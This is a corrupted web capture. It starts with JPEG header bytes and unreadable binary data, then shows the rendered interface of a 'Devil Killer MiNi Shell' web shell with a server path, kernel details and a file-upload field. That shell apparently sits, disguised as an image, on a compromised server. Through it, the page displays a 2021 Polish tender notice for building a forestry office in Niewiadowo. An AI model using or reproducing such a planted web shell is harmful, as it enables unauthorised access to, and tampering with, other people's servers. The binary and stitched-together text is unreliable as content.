JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210611/0007981001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00079810 z dnia 2021-06-11</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa samodzielnej kancelarii dla Leśnictwa Niewiadowo pod klucz </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Goleniów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810539114</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Parkowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Goleniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48914182459</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48914182919</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">goleniow@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://goleniow.szczecin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka Leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa samodzielnej kancelarii dla Leśnictwa Niewiadowo pod klucz </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a9fdc04a-c9cd-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00079810</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00064640/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa samodzielnej kancelarii dla Leśnictwa Niewiadowo pod klucz</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/goleniow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/goleniow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu środków<br/>komunikacjielektronicznej, za pośrednictwem Platformy SmartPZP (dalej – „Platforma”). Wszelkie<br/>oświadczenia,wnioski, zawiadomienia oraz informacje, przekazywane są w zakładce<br/>„Korespondencja”. W celuskorzystania z Platformy konieczna jest rejestracja Wykonawcy pod<br/>adresem:https://portal.smartpzp.pl/goleniow po kliknięciu na przycisk „Załóż konto”. Wykonawca<br/>rejestrując sięakceptuje warunki korzystania z Platformy, określone w Regulaminie podczas rejestracji<br/>oraz uznajegoza wiążący. Korzystanie z Platformy jest bezpłatne. Podgląd i pobieranie dokumentacji<br/>postępowanianie wymaga logowania. Za datę wpływu oświadczeń, ofert, wniosków, zaświadczeń oraz<br/>informacjiprzyjmuje się datę ich przekazania do Platformy. Aktualna data i godzina, zsynchronizowane<br/>zGłównym Urzędem Miar, wyświetlane są w prawym górnym rogu Platformy. Zamawiający,<br/>informuje,że Platforma jest kompatybilna ze wszystkimi podpisami elektronicznymi. Minimalne<br/>wymaganiatechniczne dotyczące korzystania z Platformy:a) przesyłane dokumenty powinny być<br/>załączone wformie plików w formacie odpowiednio . png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt,<br/>.pptx,.odt,.ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml,<br/>.msg,b)wymagania sprzętowe dla Wykonawcy:przeglądarka internetowa Mozzilla Firefox ver. 65 i<br/>późniejsze,Google Chrome ver. 66 i późniejsze lub Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i<br/>późniejsze,Internet Explorer 11lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla<br/>Firefox,Opera.Zalecane jest używanie najnowszych wersji przeglądarek, system operacyjny Windows 7<br/>iChrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK<br/>Web,oprogramowanieSzafirHost w systemie operacyjnym, stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości niemniejszej niż 1 Mb/s,komputer klasy PC lub MAC, o następującej<br/>konfiguracji: pamięć min. 3 GB RAM,procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych<br/>Linux Kernel 4.0, Windows 7 i MacOS10.12 - lub ich nowsze wersje, zainstalowany program Acrobat<br/>Reader lub inny umożliwiający obsługęformatów .pdf.Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzydo: złożenia, zmiany, wycofania oferty oraz do komunikacji<br/>wynosi 100 MB. Za pośrednictwemSystemu można przesłać wiele pojedynczych plików lub plik<br/>skompresowany do archiwum (ZIP)zawierający wiele pojedynczych plików.Pozostałe wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z Platformydostępnym pod adresem:<br/>https://portal.smartpzp.pl/goleniow/elearning oraz „Instrukcji obsługi Portalue-Usług SmartPZP”,<br/>dostępnej na stronie Platformy pod adresem:,https://portal.smartpzp.pl/goleniow/elearning. Instrukcja<br/>stanowi załącznik nr 9 do SWZ. Wykonawcaskłada ofertę wyłącznie za pośrednictwem<br/>Platformy.Wszelkie informacje stanowiące tajemnicęprzedsiębiorstwa w rozumieniu ustawy z dnia 16<br/>kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji,które Wykonawca zastrzeże jako tajemnicę<br/>przedsiębiorstwa, powinny zostać złożone w osobnym plikuwraz z jednoczesnym zaznaczeniem<br/>polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”. Zamawiający informuje, że Platforma jest<br/>kompatybilna ze wszystkimi podpisami elektronicznymi.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz.<br/>Urz. UE L119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych<br/>osobowychjest Nadleśniczy Nadleśnictwa Goleniów. Administrator wyznaczył Inspektora Ochrony<br/>Danych, paniąKarolinę Kaczmarek, z którą w sprawach dotyczących przetwarzania danych osobowych<br/>możnaskontaktować się za pośrednictwem poczty elektronicznej pod adresem<br/>rodo@szczecin.lasy.gov.pl lubtelefonicznie wybierając numer +48 91 432 87 12.Zamawiający<br/>przetwarza dane osobowe zebrane wniniejszym postępowaniu o udzielenie zamówienia publicznego w<br/>sposób gwarantujący zabezpieczenieprzed ich bezprawnym rozpowszechnianiem. Zamawiający<br/>udostępnia dane osobowe, o których mowaw art. 10 RODO w celu umożliwienia korzystania ze<br/>środków ochrony prawnej, o których mowa wdziale VI PZP, do upływu terminu do ich wniesienia. Do<br/>przetwarzania danych osobowych, o którychmowa w art. 10 RODO mogą być dopuszczone wyłącznie<br/>osoby posiadające upoważnienie. Osobydopuszczone do przetwarzania takich danych są obowiązane<br/>do zachowania ich w poufności Daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z prowadzeniemniniejszego postępowania o udzielenie zamówienia<br/>publicznego oraz jego rozstrzygnięciem, jakrównież, jeżeli nie ziszczą się przesłanki określone w art.<br/>255-256 PZP – w celu zawarcia umowy wsprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania oudzielenie zamówienia i jego archiwizacji.Odbiorcami danych<br/>osobowych będą osoby lub podmioty,którym dokumentacja postępowania zostanie udostępniona w<br/>oparciu o przepisy PZP, a także napodstawie ustawy o dostępie do informacji publicznej..Dane<br/>osobowe pozyskane w związku zprowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego będą przechowywane,zgodnie z art. 78 ust. 1 PZP, przez okres 5 lat od dnia zakończenia<br/>postępowania o udzieleniezamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywaniaobejmuje cały czas trwania umowy w sprawie zamówienia publicznego.<br/>Stosownie do art. 22 RODO,decyzje dotyczące danych osobowych nie będą podejmowane w sposób<br/>zautomatyzowany.Osoba,której dotyczą pozyskane w związku z prowadzeniem niniejszego<br/>postępowania dane osobowe, maprawo:1) dostępu do swoich danych osobowych 2) do sprostowana<br/>swoich danych osobowych 3) dożądania od Zamawiającego – jako administratora, ograniczenia<br/>przetwarzania danych osobowych zzastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>4) wniesienia skargi do PrezesaUrzędu Ochrony Danych Osobowych w przypadku uznania, iż<br/>przetwarzanie jej danych osobowychnarusza przepisy o ochronie danych osobowych, w tym przepisy<br/>RODO.Obowiązek podania danychosobowych jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem wpostępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych określa PZP. Osobie, której dane osobowe zostały pozyskane przez<br/>Zamawiającego w związku zprowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego nie przysługuje:1)prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3<br/>lit. b, d lub e RODO, 2) prawodo przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>określone w art. 21 RODOprawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na<br/>fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. .Pozostałe<br/>informacje szczegółowo podano w rozdziale 21 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.2.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja zadania inwestycyjnego pn. „Budowa<br/>samodzielnejkancelarii dla Leśnictwa Niewiadowo pod klucz”. Zadanie obejmuje budowę<br/>budynku kancelariileśnej w technologii drewnianej z prefabrykowanych elementów modułowych<br/>wraz zzagospodarowaniem terenu oraz niezbędną infrastrukturą techniczną na działce nr 157<br/>obrębNiewiadowo gm. Goleniów.1) Zakres prac obejmuje wykonania robót budowlanych tj.: 􀀁􀀁<br/>budowębudynku kancelarii leśnictwa w technologii szkieletu drewnianego, dach w formie<br/>więźbydrewnianej dwuspadowej, kryty blachodachówką, ściany prefabrykowane w<br/>szkieleciedrewnianym wraz z pracami wykończeniowymi – pod klucz; 􀀁􀀁 budowę<br/>przyłączy:elektroenergetycznego, wodociągowego, telekomunikacyjnego; 􀀁􀀁 budowę<br/>instalacji: sanitarnej,wodociągowej, ogrzewania elektrycznego, wentylacji mechanicznej,<br/>elektroenergetycznej ioświetleniowej, uziemiającej i odgromowej, teletechnicznej,<br/>przeciwwłamaniowego systemualarmowego. 􀀁􀀁 w ramach infrastruktury towarzyszącej należy<br/>wykonać drogę wewnętrzną, trzymiejsca postojowe, dojścia do budynku, plac na pojemnik z<br/>odpadami, zbiornik na nieczystościpłynne (szambo) i ogrodzenie.2) Szczegółowy opis<br/>przedmiotu zamówienia przedstawionyzostał w dokumentacji projektowej stanowiącej załączniki<br/>od nr 1 do 1E do SWZ:a) Projektbudowlany – załącznik nr 1 do SWZ:b) Projekt wykonawczy<br/>Konstrukcja - Załącznik nr 1A doSWZ obejmujący:􀀁􀀁 Projekt wykonawczy Architektura,<br/>aranżacja wnętrz 􀀁􀀁 Projekt wykonawczyInstalacje sanitarne 􀀁􀀁 Projekt wykonawczy<br/>Instalacje elektryczne 􀀁􀀁 Projekt wykonawczyInstalacje telekomunikacyjne 􀀁􀀁 Projekt<br/>wykonawczy Przyłącze wodociągowe 􀀁􀀁 Projektwykonawczy Zagospodarowanie działki<br/>nawierzchnie utwardzone c) Opinia geotechniczna załączniknr 1B do SWZd) Specyfikacja<br/>techniczna wykonania i odbioru robót - załącznik nr 1Cdo SWZ e) Przedmiary robót - załącznik<br/>nr 1D do SWZf) Uzgodnienia i decyzje - załącznik nr 1Edo SWZ tj:􀀁􀀁 Decyzja nr 37/2020 z<br/>dnia 16.01.2020 r. (WAB.6740.866.06.2019.2020.MG Nr25083) – pozwolenie na budowę –<br/>wydana przez Starostę Goleniowskiego;􀀁􀀁 Warunkitechniczne przyłączenia do sieci wod-kan<br/>(GWiK\2748\1561\KP\DT|2019 z dnia 25.09.2019 r.;􀀁􀀁Warunki techniczne przyłączenia so<br/>sieci elektroenergetycznej ENEA Operator SP. z o.o.(42972/2019/OD3/ZR3);􀀁􀀁 Decyzja nr<br/>326 z dnia 09.12.2019 r. Burmistrza Gminy Goleniów –zgoda na roboty budowlane polegające na budowie przyłącza wodociągowego w działce nr 156ob. Geodezyjny Niewiadowo<br/>(WPNS.6872.294.2019.IT);􀀁􀀁 Decyzja nr 318 o warunkach zabudowy z dnia 11.07.2019 r.<br/>wydana przez Burmistrza Gminy Goleniów(WPNS.6730.178.2019.MSZ);􀀁􀀁 Uzgodnienie<br/>lokalizacji zjazdu z dz. 156􀀁􀀁 Uzgodnienie projektuprzyłącza wodociągowegoUWAGA:<br/>przedmiot zamówienia nie obejmuje aranżacji wnętrz iwyposażenia w meble.Zamawiający nie<br/>przewiduje obowiązku odbycia przez Wykonawcę wizjilokalnej oraz sprawdzenia przez<br/>wykonawcę dokumentów niezbędnych do realizacji zamówieniadostępnych na miejscu u<br/>Zamawiającego. Przedmiotu zamówienia będzie realizowany wmiejscowości Niewiadowo<br/>działka nr 157, obręb Niewiadowo gm. Goleniów (72-100)województwo<br/>zachodniopomorskie.Zamawiający działając zgodnie z art. 95 ust. 1 PZP, wymagazatrudnienia<br/>przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy osóbwykonujących niżej<br/>wymienione czynności w zakresie realizacji zamówienia. Rodzaj czynnościzwiązanych z<br/>realizacją zamówienia, których dotyczą wymagania zatrudnienia na podstawiestosunku pracy<br/>przez Wykonawcę lub podwykonawcę osób wykonujących czynności w trakcierealizacji<br/>zamówienia:  roboty ogólnobudowlane roboty przy zagospodarowaniu terenu;czynności<br/>operatorów maszyn i sprzętów budowlanych; roboty ziemnych; roboty fundamentowe;roboty<br/>brukarskie; roboty instalacyjne; roboty elektryczne i teletechniczne; roboty montażowe;roboty<br/>wykończeniowe, malarskie.Sposób weryfikacji zatrudnienia w/w osób,<br/>uprawnieniaZamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymagań<br/>związanych zzatrudnieniem tych osób oraz sankcje z tytułu niespełnienia tych wymagań<br/>określone zostały wprojekcie umowy stanowiącym załącznik nr 4 do SWZ.Zamawiający nie<br/>wymaga zatrudnienia napodstawie umów o pracę osób wykonujących samodzielne funkcje<br/>techniczne w budownictwie.W trakcie realizacji przedmiotu zamówienia Wykonawca<br/>bezzwłocznie ma obowiązekinformowania Zamawiającego o szczególnych, prawdopodobnych,<br/>nie tylko o aktualnych ale i oprzyszłych wydarzeniach lub okolicznościach, które mogą<br/>niesprzyjająco wpłynąć na realizacjęumowy lub ją opóźnić. Załatwienie wszystkich formalności i<br/>kosztów związanych z wykonaniemprzedmiotu zamówienia leży po stronie<br/>Wykonawcy.Wykonawca udzieli na: przedmiotzamówienia gwarancji jakości i rękojmi za wady<br/>na wykonane roboty budowlane na okresminimum 60 miesięcy licząc od dnia zakończenia<br/>realizacji przedmiotu umowy wskazanego wprotokole odbioru końcowego przedmiotu umowy lub<br/>więcej – w przypadku chęci uzyskaniaprzez Wykonawcę dodatkowych punktów przyznawanych<br/>w ramach jednego z kryteriów ocenyofert tj. „Wydłużenie minimalnego (60 miesięcznego) okresu<br/>gwarancji jakości i rękojmi za wady”(patrz rozdział 16 SWZ). Wykonawca przed składowaniem<br/>lub wbudowaniem (jeżeli Wykonawcanie będzie ich składował) w obiekt określonego materiału<br/>lub urządzenia uzyska akceptacjęInspektora nadzoru, co do ich zgodności z dokumentacją<br/>projektową oraz przyjętym standardemużytkowym.W ramach niniejszego zamówienia oraz ceny<br/>oferty Wykonawca zobligowany będziedo wykonania oraz zapewnienia:a) sprawnej organizacji i<br/>zagospodarowania zapleczabudowy,b) zapewnienie zgodnych z przepisami prawa warunków<br/>bhp i ppoż.,c) w przypadkukorzystania z podwykonawców koordynowania robót<br/>podwykonawców, ponosząc za nie pełnąodpowiedzialność,d) zapewnienie nadzoru<br/>technicznego nad realizowanym zadaniem, nadzorunad personelem w zakresie porządku i<br/>dyscypliny pracy,e) prawidłowego prowadzeniadokumentacji budowy,f) wymagania dotyczące<br/>robót – wszystkie prace winny być zrealizowanezgodnie z obowiązującymi przepisami,<br/>obowiązującymi normami, warunkami technicznymi isztuką budowlaną, przepisami bhp, ppoż. z<br/>zalecaniami inspektora nadzoru Zamawiającego,oraz zgodnie z wymogami dokumentacji<br/>projektowej i wytycznymi SWZ.g) Wykonawcazobowiązany jest do przywrócenia należytego<br/>stanu i porządku terenu budowy, a także (w raziez korzystania) dróg, nieruchomości, urządzeń,<br/>obiektów itp., które Wykonawca naruszył przywykonywaniu przedmiotu zamówienia.h) Do<br/>wykonania zamówienia Wykonawca zobowiązanyjest użyć materiałów gwarantujących<br/>odpowiednią jakość, o parametrach technicznych ijakościowych odpowiadających<br/>właściwościom materiałów przyjętych w dokumentacjiprojektowej i dopuszczonych do<br/>stosowania. Przy wykonywaniu robót budowlanych Wykonawcazastosuje wyroby budowlane<br/>wprowadzone do obrotu zgodnie z zasadami określonymi wustawie z dnia 16 kwietnia 2004 r. o<br/>wyrobach budowlanych (tekst jedn. Dz. U. z 2020 poz. 215ze zm.) oraz w przepisach wykonawczych do tej ustawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">200 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę uznana zostanie Oferta Wykonawcy, która uzyska największą liczbę punktów w ramach kryteriów oceny ofert.W ramach 